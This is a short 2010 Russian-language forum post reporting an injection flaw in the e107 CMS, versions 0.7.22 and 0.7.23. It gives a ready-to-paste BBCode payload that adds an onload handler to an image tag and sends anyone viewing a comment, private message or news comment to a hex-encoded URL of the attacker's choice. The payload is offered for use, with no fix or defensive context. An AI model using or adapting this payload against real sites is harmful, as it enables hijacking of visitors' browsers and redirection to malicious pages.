03.09.2010, 17:44
|
|
Познающий
Регистрация: 07.02.2009
Сообщений: 89
С нами:
9082406
Репутация:
106
|
|
Проверял только на 0.7.22 и 0.7.23 Не совсем уязвимость, но можно запороть любой коментарий, будь то на форуме, лс или коментарий к пользователю и к новости.
достаточно вставить
Код:
[img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]http://host/e107_images/generic/bbcode/image.png[/img]
0x687474703a2f2f676f6f676c652e7275 - это захекшеный гугл, вставить можно любое
©by sw3n |
|
|